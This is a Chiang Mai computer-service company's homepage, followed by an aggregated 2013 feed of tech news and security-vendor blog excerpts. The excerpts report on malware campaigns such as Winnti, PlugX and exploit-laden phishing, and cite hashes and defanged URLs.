Farang I.T. Home:- computer service in Chiang Mai

Welcome to Farang I.T. Services, based in Chiang Mai, Thailand, offering a full range of services to commercial and domestic computer users, both locally and internationally. Our people are native speakers of many languages, including English, Suomi, French, Spanish, and of course, Thai.

We know how important it is to be able to communicate effectively with any service provider and if it's the engineer repairing your computer, designer for your website, any kind of graphical design work or programming, it's absolutely vital!

We aim to provide a 'one-stop-I.T.-shop' for all your computer related needs. From everyday computer repair to designing and building a personal computer, a corporate logo, company stationery or website. Custom designed computers from a simple home P.C. to a gaming monster to a corporate server networked with 2,000 workstations, Windows, Linux or Mac.

"if we don't have it, we'll get it!"

Don't let computer problems get to you, call us for the fastest possible solution! Did you know that most problems are preventable? Call us to discuss a customised preventative maintenance plan for your home or office systems. Similar to a car's scheduled servicing, you don't wait for the engine to seize before changing the oil, so why wait for the computer to fail before looking after it.

"more important than what you already know,
is how quickly you can learn what you need to know!"

computer problem
We can even provide training. Whether you are confused by your digital camera, stumped by your software, puzzled by your printer, or you wish to learn about the higher functions of Outlook, Word or Excel. Maybe you just bought your first Macintosh, or you want to try Linux, we can help!

"the only stupid question, is the one you didn't ask!"

LATEST VIRUS THREATS AND OTHER I.T. NEWS

Why this old-school Trekkie loves the 'Star Trek' reboots

Crave writer Amanda Kooser, a longtime Trekkie, looks at "Star Trek Into Darkness" through the lens of a long "Star Trek" history and (mostly) embraces the new ways. [Read more]

Posted on 18 May 2013 | 12:00 pm

Gallo Micro SE: How can a speaker this small sound this good?

Few "lifestyle" speakers tempt discerning audiophiles, but Anthony Gallo Acoustics' latest crop of mini models will challenge their expectations. [Read more]

Posted on 18 May 2013 | 10:36 am

Could Tumblr turn into Yahoo's MySpace?

Yahoo CEO Marissa Mayer seems dedicated to remaking Yahoo's image and infusing the company with a new spirit that Tumblr embodies. [Read more]

Posted on 18 May 2013 | 10:09 am

Pixel's camera failure only one of many

The Chromebook Pixel may be pretty, but it can't talk to cameras -- among the many problems that keep it from being a primetime laptop. [Read more]

Posted on 18 May 2013 | 10:00 am

Want a 10-foot-tall painting of 'Star Wars' action figures?

Artist Rob Buden is itching to create epic oil paintings of vintage Star Wars action figures. How about a 10-foot Hoth scene in your living room? [Read more]

Posted on 18 May 2013 | 9:00 am

NoSuchCon 2013

Fostering knowledge exchange among different generations of security researchers is maybe one of the best traits of a good security conference. Judging by its attendance, NoSuchCon can easily claim to be one of these. It's rare to see such a mix of young researchers and old gurus exchanging ideas and getting to know each other. Organized this year in Paris, NoSuchCon takes place in the premises of the Espace Oscar Niemeyer; admittedly, indeed a nice move putting a security conference within an art exposition center (congrats to the organizers :)) .

Espace Oscar Niemeyer

Posted on 18 May 2013 | 8:00 am

Winklevoss twins on Bitcoin: Time to work with the Feds

Cameron and Tyler Winklevoss, who parlayed Facebook cash into a multi-million dollar Bitcoin stake, say making money means working with the Feds. Meanwhile, the Bitcoin Foundation is about to hire its first D.C. lobbyist. [Read more]

Posted on 18 May 2013 | 7:00 am

How BlackBerry is fixing its once 'broken' brand

Chief Marketing Officer Frank Boulben is trying to re-energize the brand by focusing on the BlackBerry name, eschewing old standbys like Bold and Curve. [Read more]

Posted on 18 May 2013 | 7:00 am

DirecTV reportedly wants to buy Hulu, again

The satellite TV provider is eyeing the video streaming service, according to news reports. [Read more]

Posted on 17 May 2013 | 9:22 pm

Yahoo to consider $1.1B price tag for Tumblr this Sunday -- report

Yahoo's board of directors will decide on an all-cash offer for the hip blogging site this weekend, AllThingsD reports. [Read more]

Posted on 17 May 2013 | 8:32 pm

Q&A: MacFixIt Answers

Readers ask questions about library locations, Wi-Fi networks, and using an internal hard drive as an external drive. [Read more]

Posted on 17 May 2013 | 7:53 pm

Ready for Windows 8? We're just starting on Win 7, says Dell

Some big Dell customers are just beginning to migrate to Windows 7 -- an operating system that came out in 2009. [Read more]

Posted on 17 May 2013 | 7:30 pm

Crave Ep. 121: Wake up to a dancing iPhone

This week, we take a look at a dancing robotic iPhone dock; salute astronaut Chris Hadfield on his return to Earth; and demonstrate an essential service that lets you put your face on your pet's face. [Read more]

Posted on 17 May 2013 | 7:05 pm

Google's top product of I/O 2013: You

Instead of gadgets, the message is clear: Google's personalized services are aiming to get into your head and be a part of you...and your social life. [Read more]

Posted on 17 May 2013 | 6:50 pm

Making sense of Google's high Galaxy S4 price tag

When Google announced its exclusive version of the Samsung Galaxy S4 at Tuesday's keynote, many were left wondering about its $649 value. [Read more]

Posted on 17 May 2013 | 6:36 pm

How to handle OS X firmware updates that won't install

If you've got an OS X firmware update that just refuses to install properly, there are a few things you can try to remedy the situation. [Read more]

Posted on 17 May 2013 | 6:35 pm

Forced to live with BB10, and kind of liking it

After losing my HTC One Android, I had to rely solely on BlackBerry 10. [Read more]

Posted on 17 May 2013 | 5:54 pm

BBQ Dragon can light a grill fire in 10 minutes or less

If you have a problem getting the charcoal lit, the BBQ Dragon wants to be your summertime savior. [Read more]

Posted on 17 May 2013 | 5:50 pm

Watch the tiny teaser trailer for Batman: Arkham Origins

It's less than a minute long, but the trailer for the next Batman game introduces at least one new antagonist. [Read more]

Posted on 17 May 2013 | 5:25 pm

Intel kicks off ultrabook road trip in New York

The chipmaker is traveling the globe to show consumers some of the newest PCs and tablets. [Read more]

Posted on 17 May 2013 | 5:07 pm

Which ear you hold your cell phone to may reveal brain dominance

Researchers at Henry Ford Hospital in Detroit say that, similar to handedness, most people who hold their cell phones to their left ear are right-hemisphere dominant and vice versa. [Read more]

Posted on 17 May 2013 | 4:59 pm

The Week in Pictures: Google's utopia to a stem cell burger

Google CEO Larry Page imagines a tech-driven utopia, robotic bees take flight, and a $325,000 stem cell hamburger is ready to be eaten. [Read more]

Posted on 17 May 2013 | 4:52 pm

Google cuts network usage by terabytes by switching to WebP

Google is happy enough with WebP to spread it across the company, including the Google+ app on Android. Also: new features coming to WebP. [Read more]

Posted on 17 May 2013 | 4:46 pm

Apple removes Bang With Friends from App Store

The eyebrow-raising app won't be initiating Facebook-friend hookups for iPhone owners for the time being. [Read more]

Posted on 17 May 2013 | 4:43 pm

A coffeemaker for every day of the week

The Hamilton Beach (Model 49983) Two-Way Deluxe Coffeemaker can brew into a travel mug or a 12-cup carafe. Either K-cups or ground coffee can be used. [Read more]

Posted on 17 May 2013 | 4:07 pm

Future Firefox takes tougher stance on mixed content

Mozilla might be fine with mixed company, but it's not fond of mixed content. A new tool to block unsecured content on secure sites makes its debut in the latest update to Firefox Aurora. [Read more]

Posted on 17 May 2013 | 3:52 pm

Malicious PACs and Bitcoins

Now cybercriminals from Brazil are also interested in Bitcoin currency. In order to join the horde of phishers on the lookout for the virtual currency they have applied their best malicious technique: malicious PAC on web attacks, and phishing domains.

The malicious usage of PAC (Proxy Auto-Config) among Brazilian black hats is not something new – we’ve known about it since 2007. Generally, these kind of malicious scripts are used to redirect the victim’s connection to a phishing page of banks, credit cards and so on. We described these attacks in detail here. In 2012 a Russian Trojan banker called Capper also started using the same technique. When it’s used in drive-by-download attacks, it becomes very effective.

After registering the domain java7update.com, Brazilian criminals started attacking several websites, inserting a malicious iframe in some compromised pages:

Posted on 17 May 2013 | 9:58 am

Microsoft Updates May 2013 - Slew of Internet Explorer Critical Vulnerabilities, Kernel EoP, and Others

Microsoft released a long list of updates for Microsoft software today. The most interesting appear to be those patching Internet Explorer and the kernel software vulnerabilities. In all, ten critical "use-after-free" vulnerabilities are patched in IE along with one important Information Disclosure vulnerability, and three elevation of privilege vulnerabilities are being patched as well. Almost all of these IE vulnerabilities were reported by external security researchers working through HP's Zero Day Initiative.

The recent Internet Explorer 8 0day implemented with ROP to work across ASLR-protected Windows 7, hosted on the compromised Department of Labor website and others, was used as a part of a targeted attack watering hole campaign suggested to be run by known threat actor "DeepPanda". This IE 0day was reported by the guys over at FireEye and iSight Partners. It is being patched with Security Bulletin MS13-038. The others may not have been actively used by threat actors, but as always, it is very important for all Internet Explorer users to update these asap and avoid being a victim of the more common financially motivated mass-exploitation schemes.

A bit less sexy but very important for organizations to update are the three "Important" kernel escalation of privilege vulnerabilities. While these have not yet been known to be publicly exploited, EoP are actively deployed for post-exploitation purposes and are a significant part of any infiltration exercise. All three of these problems were reported by external security researchers, to whom Microsoft extended a "thanks".

Organizations should also be aware that Http.sys in Windows 8, Windows RT and Windows 2012 is vulnerable to denial of service attacks, but exploiting this bug appears to be very difficult. Accordingly, they are rating it "Important".

Other client side apps are being patched with "Important" rated updates as well, including Word, Publisher, and more. More information on all of these updates can be found over at Microsoft's summary.

Also today, Adobe's PSIRT pushed several important updates in ColdFusion (in the crosshairs for persistent attackers on organizations) and both of their big client side apps Flash and Reader/Acrobat.

Posted on 14 May 2013 | 2:06 pm

Telecom fraud - phishing and Trojans combined

In China telecom fraud has become an increasingly common crime. Last year there were more than 170,000 telecom fraud cases, causing the loss of over $12.5 billion. The fraudsters usually call their victims and trick them into transferring cash to a criminal gang via an ATM. But recently a new breed of telecom fraud, which combines phishing sites and backdoor Trojans, has emerged.

Last week the police from the Dongcheng sub-branch of Beijing’s Public Security Bureau asked us to help investigate a telecom fraud case. The victim was defrauded of $100,000. After our investigation, the fraudsters’ tactics were laid bare.

So how does the scam work? How was the victim deceived?

First you get a call from a ‘public prosecutor’ saying that you are implicated in a financial crime and you must help with the investigation. Of course, you deny everything, but the ‘public prosecutor’ advises you to check if you are listed in an official database as a suspected criminal. To do this, they tell you to visit the “Supreme Procuratorate’s” website, which is, of course, a phishing site:

Posted on 13 May 2013 | 3:15 am

CeCOS VII

The Counter eCrime Operations Summit VII (CeCOS VII) engages questions of operational challenges and the development of common resources for the first responders and forensic professionals who protect consumers and enterprises from the electronic-crime threat every day. The annual event, organized by the Anti-Phishing Working Group (APWG) is this time held in Buenos Aires, Argentina.

Posted on 26 April 2013 | 4:49 pm

Security policies: remote access programs

The experience of many information security officers shows that only a small portion of security incidents take place as a result of meticulously planned and sophisticated targeted attacks, while most incidents are due to a lack of effective security and control measures. This post begins a series of publications about IT security threats associated with the use of legitimate software.

TeamViewer

Hugely popular, easy-to-use and practical, remote access tools have been appreciated by system administrators and developers alike, as well as by anyone who has ever needed to log on to a work computer from a remote location, whether traveling on business, working from home, or caught out by an emergency while on vacation. However, unregulated use of this software poses a threat to corporate security and may lead to security incidents.

Posted on 25 April 2013 | 11:44 am

Lock, stock and two smoking Trojans-2

It has been three years since we published Lock, stock and two smoking Trojans in our blog. The article describes the first piece of malware designed to attack users of online banking software developed by a company called BIFIT. There are now several malicious programs with similar functionality, including:

Trojan-Spy.Win32.Lurk
Trojan-Banker.Win32.iBank
Trojan-Banker.Win32.Oris
Trojan-Spy.Win32.Carberp
Trojan-Banker.Win32.BifiBank
Trojan-Banker.Win32.BifitAgent

In spite of its functionality no longer being unique, the last program on the list caught our attention.

Words and strings used by Trojan-Banker.Win32.BifitAgent

This particular piece of malware has a number of features that set it apart from other similar programs.

Posted on 22 April 2013 | 12:24 pm

Is digital marketing the new spam?

What a week for being in Boston! I was heading to Source Conference the very same day the blast happened. It’s hard to describe all the intense emotions when I arrived. As president Obama said today to the city of Boston: “You will run again”. All my best to you guys, stay strong.

In my presentation in Source I talked about fraud in Twitter. These days we find a lot of spam bots in this social network, both blindly sending unsolicited direct messages to other users or doing some previous semantic analysis, depending on your tweets, for a more targeted message.

Posted on 22 April 2013 | 1:54 am

An ambush for peculiar Koreans

While researching PlugX propagation with the use of Java exploits we stumbled upon one compromised site that

hosted and pushed a malicious Java applet exploiting the CVE 2013-0422 vulnerability. The very malicious Java

application was detected heuristically with generic verdict for that vulnerability and it would have been hardly

possible to spot that particular site between tons of other places where various malicious Java applications were

detected with that generic verdict. But it was a very specific search conducted back then and this site appeared in

statistics among not so many search results. Well, to be honest it was a false positive in terms of search

criteria, but in this case it was a lucky mistake.

The infectious website was an Internet resource named - minjok.com and it turned out to be a news site in

Korean and English languages covering mostly political events around the Korean peninsula. We notified an editor of

this site about the compromise and although he has not responded, the site got closed after a while.

This is how minjok.com is described at http://www.northkoreatech.org/the-north-korean-website-list/minjok-tongshin/:

Description of minjok.com

Posted on 19 April 2013 | 6:24 am

Boston Aftermath

While many are still in shock after the Boston Marathon bombings on 16 April, it didn't take long for cyber criminals to abuse that tragic incident for their dirty deeds.

Today we already started receiving emails containing links to malicious locations with names like "news.html". These pages contain URLs of non-malicious youtube clips covering the recent event. After a delay of 60 seconds, another link leading to an executable file is activated.

The malware, once running on an infected machine, tries to connect to several IP addresses in Ukraine, Argentina and Taiwan. Kaspersky Lab detects this threat as "Trojan-PSW.Win32.Tepfer.*".

MD5sums of some of the collected samples: 5EA646FFDC1E9BC7759FDFC926DE7660 959E2DCAD471C86B4FDCF824A6A502DC

Our thoughts and prayers are with our colleagues in Massachusetts and others affected by the tragic events in Boston.

Posted on 17 April 2013 | 12:02 am

Winnti returns with PlugX

Continuing our investigation into Winnti, in this post we describe how the group tried to re-infect a certain gaming company and what malware they used.

After discovering that the company-s servers were infected, we began to clean them up in conjunction with the company-s system administrator, removing

malicious files from the corporate network. This took a while because it was not clear at first exactly how the cybercriminals had penetrated the corporate

network; we couldn-t find a way to completely stop attacks penetrating the network and malicious files kept appearing. An analysis performed by the gaming

company itself led us to the conclusion that the infection started after establishing working contacts with a South Korean gaming company. This was also

confirmed by our research: as we wrote before, the Winnti group is most active in East Asia and we identified 14 infected gaming companies in South Korea.

In the course of our efforts to remove the infection, the gaming company sent us suspicious files that were appearing on their computers. Many of these

files were samples of Winnti malware. As soon as information about the malicious files was added to our antivirus databases, our products were used to remove

Winnti malware from the gaming company-s corporate network. However, the attackers reacted very rapidly: new malware samples mysteriously appeared on

computers from which the infection had been completely removed the previous day. Eventually, though, our efforts proved successful and further access to the

gaming company-s computers was denied to the attackers.

However, just as we expected, it was too early to celebrate. Exactly one month after the gaming company-s network had been cleaned, the Winnti group

returned. The system administrator sent us suspicious files, which had been attached to messages sent to company employees. This was run-of-the-mill

spearphishing: the attackers introduced themselves as computer game developers and pretended to be looking for opportunities related to working with large

publishers.

Posted on 15 April 2013 | 8:30 am

Hello from Infiltrate 2013

Today is the second and last day of Infiltrate 2013 which is taking place in Miami Beach. It's my first time at Infiltrate and so far I've been really impressed with the quality of the conference.

The opening keynote by Chris Eagle definitely set the tone for the rest of the con, with a very clear focus on offense. Chris shared his own view on various issues concerning how the US Armed Forces - and the Navy in particular - deal with educating people on cyber.

One of the bits I found particularly interesting was the Title 10 issue. Many of the experts creating cyber-tools, which would make them best equipped to handle them, are civilians. However under Title 10, only military personnel can actually 'pull the trigger'. You can see how this can be problematic.

Posted on 12 April 2013 | 1:51 pm

Winnti-Stolen Digital Certificates Re-Used in Current Watering Hole Attacks on Tibetan and Uyghur Groups

A new-ish Flash exploit has been on the loose for attacks around the web. This time, the attackers have compromised a caregiver site providing support for Tibetan refugee children and are spreading backdoors signed with Winnti stolen certificates delivered with Flash exploits - the compromised web site is the NGO "Tibetan Homes Foundation". Previously, FireEye identified similar "Lady Boyle" related malicious swf exploiting CVE-2013-0634. A notification has been sent to the contacts of the web site, but apparently the malicious footer.swf file is still hosted at the Foundation's web site, so please do not visit it just yet. Also, be sure to update your Flash player to the latest version.

This site certainly appears to be a classic example of a "watering hole" attack. F-Secure pointed out another Lady Boyle watering hole set up against a related Uyghur group, which has been targeted in tandem following the early March World Uyghur Congress. The delivered backdoors are shown to be signed with Winnti-stolen digital certificates in the F-Secure post, including the stolen MGAME certificate.

Here is an example of those same stolen certs reused for the backdoors in the Tibetan Homes Foundation incident. We see both the MGAME cert and the ShenZehn certs signing the backdoors, here are screenshots of the latter:

Our products detect the Flash exploit+payload as Exploit.SWF.CVE-2013-0634.a. Here is a heatmap of our worldwide detections. Note that not all of these detections are Lady Boyle related, I estimate that at least a third of them are:

Other sites hosting the Lady Boyle swf exploit over the past couple of months have included "tibetangeeks.com", who recently cleaned up their site and posted a cooperative plea to their attackers, and "vot.org" or the "Voice of Tibet" which is also cleaned up. Currently cleaned up but previously serving "Exploit.SWF.CVE-2013-0634.a" were Uyghur related sites "istiqlaltv.com" and "maarip.org", with the same "LadyBoyle" swf path as the Tibetan Homes Foundation, i.e.:
hxxp://maarip.org/uyghur/footer(.)swf

So, what we have is an active watering hole campaign implementing a fairly new Flash exploit and abusing digital certificates that were stolen as a part of the ongoing Winnti targeted attack campaigns on game developers and publishers.

Related md5:
BD9FD3E199C3DAB16CF8C9134E06FE12
215CEC7261D70A5913E79CD11EBC9ECC
12181311E049EB9F1B909EABFDB55427

Posted on 11 April 2013 | 8:31 pm

The Winnti honeypot - luring intruders

During our research on the Winnti group we discovered a considerable amount of Winnti samples targeting different gaming companies. Using this sophisticated malicious program cybercriminals gained remote access to infected workstations and then carried out further activity manually.

Naturally, we were keen to find out how the malicious libraries spread across a local network. To do so, we tracked the attackers- activity on an infected computer.

1^st attempt: virtual machine #1

At the beginning of the investigation we ran the malicious programs on a virtual machine, which worked fairly well - we even spotted some cybercriminal activity. But they quickly realized it wasn-t a computer they wanted to net. Once that was the case, the attackers- servers stopped responding to requests from bots working on virtual machines.

This is what we managed to learn at this stage of our monitoring.

First of all, the perpetrators looked at what was happening on the victim-s desktop. After that they enabled the remote command line and used it to browse the root folder of the current disk, searched for the file winmm.dll, and checked the operating system version. The ListFileManager plugin then came into play. It works with the file system and the attackers used it to browse the folders C:\Windows and C:\Work. Then they tried to restart the computer, but made a mistake in the parameters of the ?shutdown� command, having typed ?shutdown /t /r 1� (the computer should have been restarted in 1 second), but after a while they shut the computer down completely with the use of the correct command ?shutdown /s /t 1�.

Posted on 11 April 2013 | 9:23 am

Winnti FAQ. More than just a game

Today Kaspersky Lab's team of experts published a detailed research report that analyzes a sustained cyberespionage campaign conducted by the cybercriminal organization known as Winnti.

According to report, the Winnti group has been attacking companies in the online video game industry since 2009 and is currently still active.

The group's objectives are stealing digital certificates signed by legitimate software vendors in addition to intellectual property theft, including the source code of online game projects.

The attackers' favorite tool is the malicious program we called "Winnti". It has evolved since its first use, but all variants can be divided into two generations: 1.x and 2.x. Our publication describes both variants of this tool.

In our report we publish an analysis of the first generation of Winnti.

The second generation (2.x) was used in one of the attacks which we investigated during its active stage, helping the victim to interrupt data transfer and isolate infections in the corporate network. The incidents, as well as results of our investigation, are described in the full report (PDF) on the Winnti group.

The Executive Summary is available here.

Is this research about a gaming Trojan from 2011? Why do you think it is significant?

This research is about a set of industrial cyberespionage campaigns and a criminal organization which massively penetrates many software companies and plays a very important role in the success of cyberespionage campaigns of other malicious actors.

It is important to be aware of this threat actor to understand the broader picture of cyberattacks coming from Asia. Having infected gaming companies that do business in the MMORPG space, the attackers potentially get access to millions of users. So far, we don't have data that the attackers stole from common users but we do have at least 2 incidents where the Winnti malware was planted on an online game update servers and these malicious executables were spread among a large number of the online gamers. The samples we observed seemed not to be malware targeting end user gamers, but a malware module which accidentally got into wrong place. Hoever, the potential for attackers to misuse such access to infect hundreds of millions of Internet users creates a major global risk.

It's important to understand that many gaming companies do business not only in gaming, but very often they are also developers or publishers of different other types of software. We have tracked an incident where a compromised company served an update of their software which included a Trojan from the Winnti hacking team. That became an infection vector to penetrate another company, which in turn led to a personal data leak of large number of its customers.

So far, this research is dedicated to a malicious group that not only undermines trust in fair gameplay but has a serious impact on trust in software vendors in general, especially in the regions where the Winnti group is active at the moment.

What are the malicious purposes of this Trojan?

The Trojan, or to be precise, a penetration kit called Winnti includes various modules to provide general purpose remote access to compromised machines. This includes general system information collection, file and process management, creating chains of network port redirection for convenient data exfiltration and remote desktop access.

Is this attack still active?

Yes, despite active steps to stop the attackers by the revocation of digital certificates, detection of the malware and an active investigation, the attackers remain active, with at least several victim companies around the world being actively compromised.

Posted on 11 April 2013 | 9:21 am

Microsoft Updates April 2013 - 3 Critical Vulnerabilities

Microsoft released two Bulletins this month patching 3 critical vulnerabilities. Along with these immediate issues, they released five other Bulletins rated "Important". It appears that the two critical Bulletins address use-after-free vulnerabilities that can all be attacked through Internet Explorer.

For the Windows workstation environments, all versions of Internet Explorer need to be patched asap, including v10 preview running on Windows RT. The patch for Internet Explorer 10 on Windows RT is available at the "Windows Update" site.

In addition to the privately reported vulnerabilities in Internet Explorer code itself, the Remote Desktop Connection v6.1 Client and Remote Desktop Connection v7.0 Client ActiveX components on XP, Vista, and Windows 7 are vulnerable. Microsoft's SRD team expects to see exploits available within 30 days targeting CVE-2013-1296.

Of the "Important" vulnerabilities, interesting to note is a privately reported Elevation of Privilege issue CVE-2013-0078, which is a bug in the Windows Defender anti-malware engine running on Windows 8 and Windows RT. This vulnerability could be used by an insider or determined adversary to gain further access, and not a type of vulnerability usually hit by mass exploitation kits. Within organizations, this is something to quickly address, but generally individuals do not need to urgently address this type of issue.

See Microsoft's Security Bulletin Summary for April 2013 for the full list of this month's Bulletin releases.

Posted on 9 April 2013 | 2:23 pm

Absent-minded spammers

A large number of scam emails disguised as newsletters sent by the CNN television channel have been detected again. Sensational headlines are used in the messages to grab the attention of recipients (e.g., falling stock indexes, the election of a new Pope etc.). Users are asked to click on the links provided in the messages to get access to the complete versions of the articles. To make them look authentic, the emails also include links to real CNN pages, but of course the link with the main piece of news is fake. It leads to a compromised website which uses JavaScript to redirect the user to a site hosting malware - in this case, the Blackhole exploit kit.

At the same time as the CNN newsletter scam, there has also been an epidemic of scam emails imitating Facebook notifications. In these emails, spammers suggested that users check out new comments on their photos. The mechanism used in the malicious link was the same as in the case described above. The most curious part, though, was that the scammers did not even bother to change the links. While in the former case the link included “cnnbrnews.html” after the domain name, the same ending in the link provided in fake Facebook messages looks out of place.

Unfortunately, this is the only part of the scam where the cybercriminals were careless. Emails containing the malicious links are still being distributed, so be cautious when handling suspicious messages.

Posted on 9 April 2013 | 9:42 am

Skypemageddon by bitcoining

Is it a Skype day? Or maybe a Bitcoin one? Or maybe just both- I say this because right after I published my previous post about malware ongoing campaign on Skype, a mate from Venezuela sent me a screenshot of her Skype client with a similar campaign in terms of propagation but different in terms of origins and purposes. Here is the original screenshot:

(Translation from Spanish: ?this is my favorite picture of you�)

Posted on 4 April 2013 | 3:28 pm

An avalanche in Skype

There is a new malicious ongoing campaign on Skype. It’s active and kicking yet. The infection vector is via social engineering abusing infected Skype by sending massive messages to the contacts like these ones: i don't think i will ever sleep again after seeing this photo http://www.goo.gl/XXXXX?image=IMG0540250-JPG tell me what you think of this picture i edited http://www.goo.gl/XXXXX?image=IMG0540250-JPG Goo.gl short URL service shows that at the moment there are more than 170k clicks on the malicious URL and only 1 hour ago there were around 160k clicks. It means the campaign is quite active with around 10k clicks per hour or with 2.7 clicks per second! The most of victims come from Russia and Ukraine:

Posted on 4 April 2013 | 10:40 am

Virus calendar wallpapers for 2013

Some of you may remember the virus wallpaper calendars that we published in previous years, listing a selection of significant events in the history of the IT security industry.

Well, we're posting new versions for 2013.

April's wallpaper is here.

clickable!

But be sure to check our calendar page each month as we'll be adding new wallpapers as we go through the year.

We hope they'll be an interesting background for your desktop, as well as highlighting key security events from the past.

Posted on 4 April 2013 | 4:06 am

The Biggest DDoS Ever that "Almost Broke the Internet"?

"If the Internet felt a bit more sluggish for you over the last few days in Europe, this may be part of the reason why." Well, "a bit more sluggish" for limited sets of communications in parts of Europe for a few days is not a broken internet, and is certainly not close to a critical infrastructure disaster.

There's been a lot of attention for the recent reports regarding a DDoS attack against Spamhaus which reached a peak of 300gbps. Yes, such enormous amount of throughput definitely makes this one of the biggest DDoS attacks ever seen. DDoS attacks have seen an increase in popularity in recent times and there's no sign they'll go away anytime soon. Cyber-criminals, competitors, hacktivists and nation-state sponsored actors all have their motives to use DDoS attacks. In this case, a suspected entity behind these attacks is a Dutch hosting company called CyberBunker, whose owner denies being responsible, but claims to be a spokesman for the attackers. The conflict between Spamhaus and CyberBunker goes back to 2011 and has now escalated after Spamhaus blacklisted CyberBunker earlier this month. The timing and conflict is uncanny. And, Spamhaus is certainly under attack from some determined group capable of generating massive amounts of traffic, forcing them to move to hosting and service provider CloudFlare, known for effectively dissipating large DDoS attacks.

Posted on 30 March 2013 | 12:25 am

Military Hardware and Men’s Health

Over the last few months we have seen a series of very similar targeted attacks being blocked in our Linux Mail Security Product. In each case the documents used were RTF and the exploit was CVE-2012-0158 (MSCOMCTL.OCX RCE Vulnerability).

The attacks seem to be from the same group and most appear to be sent from Australia or Republic of Korea. The sender IP addresses vary but many are sent via mail.mailftast.com. This domain is registered in China:

REGISTRANT CONTACT INFO liu runxin No.1,Nanjing Road Shanghai Shanghai 200001 CN Phone:         +86.2164415698 Email Address: lishd2011@163.com

The documents are in three categories:

The first group of documents are related to articles on the Men’s Health website. These are some example filenames:

EAT FOR BETTER SEX.doc How to last longer in bed.doc 6 Awkward Sex Moments, Defused.doc 9 ways to have better,hotter,and more memorable sex.doc 10 Ways to Get More Sex.doc

The second group are military related:

Stealth Frigate.doc The BrahMos Missile.doc How DRDO failed India's military.doc

The third set have Cyrillic filenames:

приоритеты сотрудничества.doc Список участников рабочей группы(0603-2013).doc Список кадров.doc Приглашение МИОМ ТЕЙКОВО 2013.doc

Posted on 29 March 2013 | 8:40 am

Android Trojan Found in Targeted Attack

In the past, we've seen targeted attacks against Tibetan and Uyghur activists on Windows and Mac OS X platforms. We've documented several interesting attacks (A Gift for Dalai Lamas Birthday and Cyber Attacks Against Uyghur Mac OS X Users Intensify) which used ZIP files as well as DOC, XLS and PDF documents rigged with exploits.

Several days ago, the e-mail account of a high-profile Tibetan activist was hacked and used to send targeted attacks to other activists and human rights advocates. Perhaps the most interesting part is that the attack e-mails had an APK attachment - a malicious program for Android.

The attack

On March 24th, 2013, the e-mail account of a high-profile Tibetan activist was hacked and used to send spear phishing e-mails to their contact list. This is what the spear phishing e-mail looked like:

In regards to the message text above, multiple activist groups have recently organized a human rights conference event in Geneva. We've noticed an increase in the number of attacks using this event as a lure. Here's another example of such an attack hitting Windows users:

Going back to the Android Package (APK) file was attached to the e-mail, this is pushing an Android application named "WUC's Conference.apk".

This malicious APK is 334326 bytes file, MD5: 0b8806b38b52bebfe39ff585639e2ea2 and is detected by Kaspersky Lab products as "Backdoor.AndroidOS.Chuli.a".

After the installation, an application named "Conference" appears on the desktop:

If the victim launches this app, he will see text which "enlightens" the information about the upcoming event:

Posted on 26 March 2013 | 8:14 am

The TeamSpy Crew Attacks - Abusing TeamViewer for Cyberespionage

Earlier today, the Laboratory of Cryptography and System Security (CrySyS Lab), together with the Hungarian National Security Authority (NBF), published details on a high profile targeted attack against Hungary. The details about the exact targets are not known and the incident remains classified.

Considering the implications of such an attack, Kaspersky Lab’s Global Research & Analysis Team performed a technical analysis of the campaign and related malware samples.

You can read our short FAQ below and you can download our technical analysis paper linked at the end of the blogpost.

Posted on 20 March 2013 | 1:23 pm

South Korean 'Whois Team' attacks

Earlier today, reports of a number of cyberattacks against various South Korean targets hit the news.

The attackers, going by the handle “Whois Team” left a number of messages during the defacements:

Posted on 20 March 2013 | 8:09 am

The end of MSN Messenger, the beginning of attacks

Microsoft recently announced the shutdown of its popular IM client MSN Messenger, which will be replaced by Skype, but its end represents the beginning of malicious attacks posing as the installer of the software. Cybercriminals already started to use this fact in their attacks, registering malicious domains, buying sponsored links on search engines, tricking users to download and install a malware masquerade as the MSN installer.

MSN Messenger is still very popular in several countries; Microsoft informed that the service has more than 100 million users worldwide, approximately 30.5 million of them in Brazil. As an escalated migration of all users is planned, it's getting harder to find the installer of the program and this is the window of opportunity exploited by Brazilian cybercriminals aiming to infect users looking for the software.

In a simple search on Google for "MSN messenger" the first result displayed is sponsored link of a malicious domain aiming to distribute the fake installer, which is actually a Trojan banker:

Posted on 19 March 2013 | 7:27 am

Hello from Malaysia

In mid-February 2013 a Kaspersky user from Malaysia asked us to check a Google Play application called My HRMIS & JPA Demo developed by Nur Nazri.

The user was suspicious about the large number of permissions required by the app, though its only stated function was to open four websites.

Posted on 15 March 2013 | 10:48 am

Highlights from BlackHat Europe 2013 in Amsterdam

Every year as Europe wakes up from the cold winter to the warm days of spring, BlackHat traditionally descends to Amsterdam. This year’s conference is taking place on March 14-15 at the NH Grand Hotel Krasnapolsky, right Dam Square, the heart of Amsterdam. As spring doesn’t necessarily equal warm days here in Europe right now, the 500 or so BlackHat participants hit the conference rooms to attend quite a few interesting talks. Here’s a summary of the best talks at BlackHat Europe 2013.

Posted on 15 March 2013 | 10:41 am

Reminder: be careful opening invoices on the 21st March

On March 4^th we spotted a large number of unusual emails being blocked by our Linux Mail Security product. The emails all contained the same PDF attachment (MD5: 97b720519aefa00da58026f03d818251) but were being sent from many different source addresses.

The emails were written in German and most were sent from German IP addresses. Below is a map showing the distribution of addresses:

The computer names referenced in the mail headers were often of the form Andreas-PC or Kerstin-Laptop (the names have been changed to protect the innocent) suggesting that they had been sent from German home computers.

Posted on 14 March 2013 | 11:23 am

New Uyghur and Tibetan Themed Attacks Using PDF Exploits

On Feb 12th 2013, FireEye announced the discovery of an Adobe Reader 0-day exploit which is used to drop a previously unknown, advanced piece of malware. We called this new malware "ItaDuke" because it reminded us of Duqu and because of the ancient Italian comments in the shellcode copied from Dante Alighieri's "Divine Comedy".

Previously, we posted about another campaign hitting Governments and other institutions, named Miniduke, which was also using the same "Divine Comedy" PDF exploits.

In the meantime, we've come by other attacks which piggyback on the same high level exploit code, only this time the targets are different: Uyghur activists.

Together with our partner at AlienVault Labs, we analyzed these new exploits. For their blog, which includes Yara rules and industry standard IOC's, please read [here]. For our analysis, please read below.

The new attacks

A few days ago, we observed several PDF files which carry the CVE-2013-0640/641 (ItaDuke) exploits. Some of the MD5s and filenames include:

7005e9ee9f673edad5130b3341bf5e5f 2013-Yilliq Noruz Bayram Merik isige Teklip.pdf d00e4ac94f1e4ff67e0e0dfcf900c1a8 ÁLÃûÐÅ.pdf (joint_letter.pdf) ad668992e15806812dd9a1514cfc065b arp.pdf

